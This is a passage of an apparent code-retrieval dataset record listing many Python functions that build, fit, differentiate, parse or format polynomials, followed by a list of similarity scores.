This can be used like\n # any other function\n return prediction_function", "def _reform_poly_coefficients(fit_poly_x, fit_poly_y):\n # Extract values for CD matrix and recombining\n c11 = fit_poly_x.c1_0.value\n c12 = fit_poly_x.c0_1.value\n c21 = fit_poly_y.c1_0.value\n c22 = fit_poly_y.c0_1.value\n sip_poly_x = fit_poly_x.copy()\n sip_poly_y = fit_poly_y.copy()\n # Force low order coefficients to be 0 as defined in SIP\n sip_poly_x.c0_0 = 0\n sip_poly_y.c0_0 = 0\n sip_poly_x.c1_0 = 0\n sip_poly_x.c0_1 = 0\n sip_poly_y.c1_0 = 0\n sip_poly_y.c0_1 = 0\n\n cdmat = ((c11, c12), (c21, c22))\n invcdmat = npla.inv(np.array(cdmat))\n degree = fit_poly_x.degree\n # Now loop through all remaining coefficients\n for i in range(0, degree + 1):\n for j in range(0, degree + 1):\n if (i + j > 1) and (i + j < degree + 1):\n old_x = getattr(fit_poly_x, f'c{i}_{j}').value\n old_y = getattr(fit_poly_y, f'c{i}_{j}').value\n newcoeff = np.dot(invcdmat, np.array([[old_x], [old_y]]))\n setattr(sip_poly_x, f'c{i}_{j}', newcoeff[0, 0])\n setattr(sip_poly_y, f'c{i}_{j}', newcoeff[1, 0])\n\n return cdmat, sip_poly_x, sip_poly_y", "def Hdiv_polynomials(\n domain_dim: int, range_dim: int, order: int, variables: AxisVariablesNotSingle = x\n) -> typing.List[VectorFunction]:\n assert domain_dim == range_dim\n if domain_dim == 2:\n return [VectorFunction((\n variables[0] * variables[0] ** (order - 1 - j) * variables[1] ** j,\n variables[1] * variables[0] ** (order - 1 - j) * variables[1] ** j,\n )) for j in range(order)]\n if domain_dim == 3:\n basis: typing.List[VectorFunction] = []\n for j in range(order):\n for k in range(order - j):\n p = variables[0] ** (order - 1 - j - k) * variables[1] ** j * variables[2] ** k\n basis.append(VectorFunction((variables[0] * p, variables[1] * p, variables[2] * p)))\n return basis\n\n raise ValueError(f\"Unsupported dimension: {domain_dim}\")", "def equations(p):\n [x, y] = p\n list = [x - 5 , y - 5]\n return list", "def _evalPoly(self,a,x):\n y = a[0]\n for i in range(1,len(a)):\n y = self.F.Multiply(y, x)\n y = self.F.Add(y, a[i])\n return y", "def Hdiv_quolynomials(\n domain_dim: int, range_dim: int, order: int, variables: AxisVariablesNotSingle = x\n) -> typing.List[VectorFunction]:\n assert domain_dim == range_dim\n basis: typing.List[VectorFunction] = []\n for d in range(domain_dim):\n for j in product(range(order), repeat=domain_dim - 1):\n poly = 1\n for a, b in zip(variables, j[:d] + (order,) + j[d:]):\n poly *= a ** b\n basis.append(VectorFunction([poly if i == d else 0 for i in range(domain_dim)]))\n return basis", "def construct3rdSumPoly(E):\n if E.a1() != 0 or E.a2() != 0 or E.a3() != 0:\n raise TypeError('Provided elliptic curve is not in the short Weierstrass form.') \n \n FF = E.base_field()\n A = E.a4()\n B = E.a6()\n PR.<s1, s2, s3> = PolynomialRing(FF, 3, order='degrevlex')\n smp = (s1 - s2)**2*s3**2 - 2*((s1 + s2)*(s1*s2 + A) + 2*B)*s3 + (s1*s2 - A)**2 - 4*B*(s1 + s2)\n return smp", "def build_poly(x, degree):\n \n X = np.vander((x[:,0]).T, degree+1, increasing=True)\n \n for i in range(1,np.shape(x)[1],1):\n feat = (x[:,i]).T\n vander = np.vander(feat, degree+1, increasing=True)\n #remove the column of 1 at the beginning of each vander\n vander = np.delete(vander, 0,axis = 1)\n #concatenation\n X = np.concatenate((X, vander), axis=1)\n \n return X", "def parameters_polynomial(cobj, prop, prop_units, alist, blist):\n for i, aval in enumerate(alist):\n if i == 0:\n param_units = prop_units\n else:\n param_units = prop_units / pyunits.K**i\n\n coeff = Var(doc=\"A 
parameter for CoolProp polynomial form\", units=param_units)\n cobj.add_component(prop + \"_coeff_A\" + str(i), coeff)\n coeff.fix(aval)\n\n for i, bval in enumerate(blist):\n if i == 0:\n param_units = pyunits.dimensionless\n else:\n param_units = pyunits.K**-i\n\n coeff = Var(doc=\"B parameter for CoolProp exponential form\", units=param_units)\n cobj.add_component(prop + \"_coeff_B\" + str(i), coeff)\n coeff.fix(bval)", "def generate_poly(hyper, params):\n\n k, d = hyper['k'], hyper['d']\n #atoms = { \n # (h,) : symbols('h_%d'%h)\n # for h in xrange(1, k+1)\n # }\n #atoms[(k,)] = 1. - sum( symbols('h_%d'%h) for h in xrange(1, k) )\n\n atoms = {}\n for h in xrange(1,k+1):\n atoms.update({ \n (h,x1) : symbols('x_%d%d'%(h,x1))\n for x1 in xrange(1,d+1)\n })\n #atoms[(h,d)] = 1. - sum(symbols('x_%d%d'%(h,x1)) for x1 in xrange(1,d))\n\n m = {}\n for x1 in xrange(1,d+1):\n m[(x1,)] = poly( sum( atoms[(h,x1)] for h in xrange(1,k+1) ) )\n for x2 in xrange(1,d+1):\n m[(x1,x2)] = poly( sum( atoms[(h,x1)] * atoms[(h,x2)] for h in xrange(1,k+1) ) )\n for x3 in xrange(1,d+1):\n m[(x1,x2,x3)] = poly( sum( atoms[(h,x1)] * atoms[(h,x2)] * atoms[(h,x3)] for h in xrange(1,k+1) ) )\n\n return m", "def general_poly (L):\r\n\r\n def secondFunc(x):\r\n total = 0\r\n listLength = len(L)-1\r\n for i in L:\r\n total += i * x**listLength\r\n listLength -= 1\r\n return(total)\r\n return secondFunc", "def __polydiff__(x, dt, params, options=None):\n if isinstance(options, dict) and 'weights' in options.keys():\n w = options['weights']\n else:\n w = np.ones_like(x)\n\n if isinstance(params, list):\n order = params[0]\n else:\n order = params\n\n t = np.arange(1, len(x)+1)*dt\n\n # polyfit\n r = np.polyfit(t, x, order, w=w)[::-1]\n\n # derivative coefficients\n dr = copy.copy(r[1:])\n for i, _ in enumerate(dr):\n dr[i] = dr[i]*(i + 1)\n\n # evaluate dxdt_hat\n dxdt_hat = 0\n for i, _ in enumerate(dr):\n dxdt_hat += dr[i]*t**i\n\n # evaluate smooth x\n x_hat = 0\n for i, _ in enumerate(r):\n x_hat += r[i]*t**i\n\n return x_hat, dxdt_hat", "def PolyDiffPoint(u, x, deg = 3, diff = 1, index = None):\n \n n = len(x)\n if index == None: index = int((n-1)/2)\n\n # Fit to a polynomial\n poly = np.polynomial.chebyshev.Chebyshev.fit(x,u,deg)\n \n # Take derivatives\n derivatives = []\n for d in range(1,diff+1):\n derivatives.append(poly.deriv(m=d)(x[index]))\n \n return derivatives", "def _getFrac(expr):\n expr=expr.replace(' ', '')\n l = len(expr)\n frac = []; start = 0; par = 0\n pack=''; num=''\n op = ['+','-']\n operator = ['+','-','/','*']\n sym = ['x','y']\n multFrac = False\n\n for i in range(0,l):\n if expr[i]=='(' : #(\n if par==0 : start=i\n par += 1\n elif expr[i] == ')' : #)\n par -= 1\n if par==0 :\n pack += expr[start:i+1]; start = i+1\n elif expr[i]=='*'and par==0: #*\n pack += expr[start:i]; start = i+1\n if num!='' :\n frac.append((num,pack))\n frac.append(expr[i])\n pack = ''; num = ''\n else :\n pack += expr[i]\n elif expr[i]=='/'and par==0: #/\n pack += expr[start:i]\n num += pack\n pack = ''\n start = i+1\n elif expr[i] in op and par==0 and num != '': #+-\n pack += expr[start:i]\n frac.append((num,pack))\n frac.append(expr[i])\n pack = ''; num = ''; start = i+1\n elif expr[i] in op and par==0:\n pack += expr[start:i]\n frac.append((pack,''))\n frac.append(expr[i])\n pack = ''; num = ''; start = i+1\n\n if start < l : pack += expr[start:l]\n if num != '' :\n frac.append((num,pack))\n else:\n frac.append((pack,''))\n\n frac2 = [frac[0]]\n i=1\n while i<len(frac):\n if frac[i] in operator and frac[i]!='*' 
:\n frac2.append(frac[i])\n frac2.append(frac[i+1])\n elif frac[i]=='*' :\n (a1,b1)=frac[i-1]\n (a2,b2)=frac[i+1]\n frac2[len(frac2)-1]=(a1+'*'+a2,b1+'*'+b2)\n i+=2\n return frac2", "def strMultiPoly(poly, symbol=[\"X\",\"Y\"], asc=True):\n return termorder.MultivarTermOrder(cmp).format(MultiVarPolynomial(poly,symbol), symbol, asc)", "def build_poly(x, degree):\n tx = np.zeros((x.shape[0], x.shape[1]*(degree+1)))\n \n for j in range(degree+1):\n tx[:,x.shape[1]*j:x.shape[1]*(j+1)] = np.power(x,j)\n \n return tx", "def nice_cubic_polynomial(p):\n tmp = \"\"\n if p[\"a\"] == 1:\n tmp += \" x^3\"\n elif p[\"a\"] != 0:\n tmp += \"%.2fx^3\" % p[\"a\"]\n if p[\"b\"] == 1:\n tmp += \"\\t+ x^2\"\n elif p[\"b\"] != 0:\n tmp += \"\\t+ %.2fx^2\" % p[\"b\"]\n else:\n tmp += \"\\t\\t\"\n if p[\"c\"] == 1:\n tmp += \"\\t+ x\"\n elif p[\"c\"] != 0:\n tmp += \"\\t+ %.2fx\" % p[\"c\"]\n else:\n tmp += \"\\t\\t\"\n if p[\"d\"] != 0:\n tmp += \"\\t+ %.2f\" % p[\"d\"]\n return tmp", "def polyrecur(order,dist,trunc=1):\n\n printer(0,'Computing polynomials ...')\n if not isinstance(dist,Joint): dist = Joint(dist)\n\n nbrPoly = order+1\n dim = dist[:].shape[0]\n expo = np.arange(nbrPoly)\n coef = np.zeros((nbrPoly,nbrPoly))\n norm = np.ones((dim,nbrPoly))\n\n coef[0,0] = 1\n polyList = []\n\n # Creates the univariate polynomial basis\n\n for i in range(dim):\n\n polyList.append(Polynomial(expo,coef))\n AB = dist[i].coef(nbrPoly)\n\n for j in range(1,nbrPoly):\n\n norm[i,j] = norm[i,j-1]*AB[1,j]\n polyList[i][j] = np.roll(polyList[i][j-1],1,axis=0)\n polyList[i][j] -= AB[0,j-1]*polyList[i][j-1]+AB[1,j-1]*polyList[i][j-2]\n\n # Normalization and tensor product\n\n for i in range(dim): polyList[i][:] /= np.sqrt(norm[i,:,None])\n poly = tensdot(polyList,order,trunc)\n\n printer(1,'Computing polynomials 100 %')\n return poly", "def test_polynomial_from_string_the_same_as_string_args(self):\n coeffs = \"abcdefghijklmnopqrstuvwxyz\"\n\n p1 = Polynomial(coeffs)\n p2 = Polynomial(*coeffs)\n\n self.assertEqual(p1, p2)", "def part_der(f,l):\r\n \r\n der = [] #empty list which derived functions will be appended onto\r\n for i in l:\r\n \r\n der.append(sym.diff(f, lambda i: f))\r\n print(der) \r\n return der", "def poly(x, coeffs):\n return np.sum([coeffs[i] * x ** i for i in range(len(coeffs))], axis=0)", "def PBpoly(n, x):\n n = int(n)\n return Bpoly(n, x-math.floor(x))", "def minpoly(firstterms):\n field = ring.getRing(firstterms[0])\n r_0 = uniutil.polynomial({len(firstterms):field.one}, field)\n r_1 = uniutil.polynomial(enumerate(reversed(firstterms)), field)\n poly_ring = r_0.getRing()\n v_0 = poly_ring.zero\n v_1 = poly_ring.one\n n = len(firstterms) // 2\n\n while n <= r_1.degree():\n q, r = divmod(r_0, r_1)\n v_0, v_1 = v_1, v_0 - q*v_1\n r_0, r_1 = r_1, r\n return v_1.scalar_mul(v_1.leading_coefficient().inverse())", "def E_polynomial(self):\n\n from nodepy import stability_function\n p, q = self.stability_function()\n return stability_function.E_polynomial(p, q)", "def generate_random_tropical_poly(max_degree, min_coefficient, max_coefficient):\n coefficients = []\n for d in range(0, random.randint(1, max_degree) + 1):\n coefficients.append(random.randint(min_coefficient, max_coefficient))\n return coefficients", "def anti_deriv(self):\n poly_anti_deriv = [0]\n for i, val in enumerate(self.coeff):\n poly_anti_deriv.append(round(val/(i+1.0), 2))\n return Poly(poly_anti_deriv)", "def calc_poly_linear_regression(independent, dependent):\n # Reshape for sklearn\n independent = independent.values.reshape(-1,1)\n 
dependent = dependent.values.reshape(-1,1)\n # Make the whole thing poly\n poly = PolynomialFeatures(degree=2)\n independent_ = poly.fit_transform(independent)\n # Do the linear regression\n model = LinearRegression()\n model.fit(independent_, dependent)\n # Calculate R2\n return model.score(independent_, dependent)", "def poly(x, degree=2):\n x = np.array(x)\n X_trans = np.transpose(np.vstack((x**k for k in range(degree + 1))))\n return np.linalg.qr(X_trans)[0][:, 1:]", "def poly(*args):\n if len(args) == 0 or len(args) == 2:\n raise ValueError('bad number of arguments {} passed to poly()'.format(len(args)))\n if len(args) == 1:\n if ispoly(args[0]):\n return deepcopy(args[0])\n else:\n raise VauleError('non-poly list passed to poly()')\n # args is of length 3 or greater. Check to see if args are points\n a = list(args)\n b = list(filter(lambda x: not ispoint(x),a))\n if len(b) > 0:\n raise ValueError('non-point arguments to poly(): {} '.format(b))\n return deepcopy(a)", "def addPol(*pol):\n\n sum = np.zeros((1,))\n for p in pol:\n sum = polyadd(sum, p)\n\n return sum", "def factor_polynomial(a,b,c):\r\n afacts = factors(abs(a))\r\n cfacts = factors(abs(c))\r\n #choose a factor of a (d), then f is a/d and so on\r\n for d in afacts:\r\n for g in cfacts:\r\n f = a/d\r\n e = c/g\r\n if e*f + d*g == b:\r\n print(\"{}*x**2 + {}*x + {} = ({}x + {})({}x + {})\".format(a,b,c,d,int(e),int(f),g))\r\n return\r\n #return False\r", "def get_poly(kwargs):\n from sklearn.preprocessing import PolynomialFeatures\n return PolynomialFeatures(**kwargs)", "def __merge(self, inputPoly, op):\n newPoly = Polynomial()\n\n # cast the input to a Polynomial\n inputPoly = ensurePoly(inputPoly)\n if isinstance(inputPoly.poly, (int, float, Variable.Variable)):\n input = Polynomial()\n input.poly = [op, inputPoly.poly]\n else:\n input = inputPoly\n\n if isinstance(self.poly, (int, float, Variable.Variable)):\n self.poly = [op, self.poly]\n\n if op == self.poly[0] and op == input.poly[0]:\n newPoly.poly = self.poly + input.poly[1:]\n elif op == self.poly[0]:\n newPoly.poly = self.poly\n newPoly.poly.append(input)\n elif op == input.poly[0]:\n newPoly.poly = [input.poly[0], self]\n newPoly.poly.extend(input.poly[1:])\n else:\n newPoly.poly = [op, self, input]\n\n return newPoly", "def polyfit(dates, levels, p):\n x = matplotlib.dates.date2num(dates)\n\n y = levels\n\n # Using shifted x values, find coefficient of best-fit\n # polynomial f(x) of degree p\n shifted_times = [t-x[0] for t in x]\n p_coeff = np.polyfit(shifted_times, y, p)\n\n # Convert coefficient into a polynomial that can be evaluated\n # e.g. poly(0.3)\n poly = np.poly1d(p_coeff)\n\n return (poly, x[0])", "def reducedFormOne(self, equation):\n splitter = re.split('(\\+|\\-)', equation)\n newEquation = str()\n state = 0\n for token in splitter:\n if '(' in token or state > 0 or '[' in token:\n state += 1\n newEquation += token\n continue\n if ')' in token or ']' in token:\n state -= 1\n continue\n if '^' + self.var in token:\n newEquation += token\n self.validPolynome = False\n continue\n find = re.findall('(\\*|\\^|\\/)?(' + self.var + ')(\\^\\d+)?' 
, token)\n newVar = []\n for var in find:\n newVar.append(''.join(map(str,var)))\n for var in newVar:\n token = token.replace(var, '')\n if token != '+' and token != '-' and token != '':\n try:\n newEquation += str(eval(token.replace('^', '**'))) + ''.join(newVar)\n except:\n self.error = True\n continue\n else:\n newEquation += token\n return newEquation", "def _polynomial_entity(value, context):\n assert isinstance(value, Polynomial)\n coefficients = np.asarray(value.coefficients)\n num_variables = coefficients.ndim\n variables = [sympy.Symbol(context.pop()) for _ in range(num_variables)]\n function_symbol = context.pop()\n handle = FunctionHandle(function_symbol)\n handle_description = sympy.Function(function_symbol)(*variables)\n\n polynomial = polynomials.coefficients_to_polynomial(coefficients, variables)\n polynomial = polynomial.sympy()\n\n return Entity(\n context=context,\n value=value,\n expression=polynomial,\n polynomial_variables=variables,\n description='Let {function} = {polynomial}.',\n handle=handle,\n function=handle_description,\n polynomial=polynomial)" ]
[ "0.6846461", "0.65011793", "0.6292352", "0.6274255", "0.62225056", "0.61097145", "0.60969347", "0.6090148", "0.60779357", "0.60200155", "0.60196537", "0.59783614", "0.5969226", "0.5965326", "0.5856345", "0.5849811", "0.58080703", "0.5775723", "0.5735005", "0.5733751", "0.5722096", "0.5698544", "0.56953406", "0.56824267", "0.5653592", "0.5636684", "0.563195", "0.56265783", "0.56259936", "0.55919147", "0.55880266", "0.5585891", "0.5576518", "0.5575801", "0.5565807", "0.55617356", "0.5559807", "0.555813", "0.5551955", "0.55366033", "0.5531899", "0.5521932", "0.55078155", "0.55027956", "0.54881066", "0.5472018", "0.5467412", "0.5459621", "0.54507357", "0.5449399", "0.54257417", "0.5409083", "0.53826433", "0.5372734", "0.53560984", "0.5348208", "0.53363293", "0.5330159", "0.53247994", "0.53188366", "0.53168577", "0.529635", "0.52777994", "0.52713233", "0.5267082", "0.5258767", "0.52576727", "0.5250707", "0.52387667", "0.523134", "0.52311265", "0.521637", "0.5212681", "0.52106714", "0.5195989", "0.5189531", "0.51671946", "0.5159518", "0.51566106", "0.5144678", "0.51300174", "0.5122544", "0.51157093", "0.5110835", "0.51055366", "0.5098564", "0.50945264", "0.50908965", "0.5087293", "0.50872725", "0.50866365", "0.50831044", "0.5082207", "0.5081495", "0.50732553", "0.5072947", "0.5071048", "0.50679743", "0.50673664", "0.5057545" ]
0.70788777
0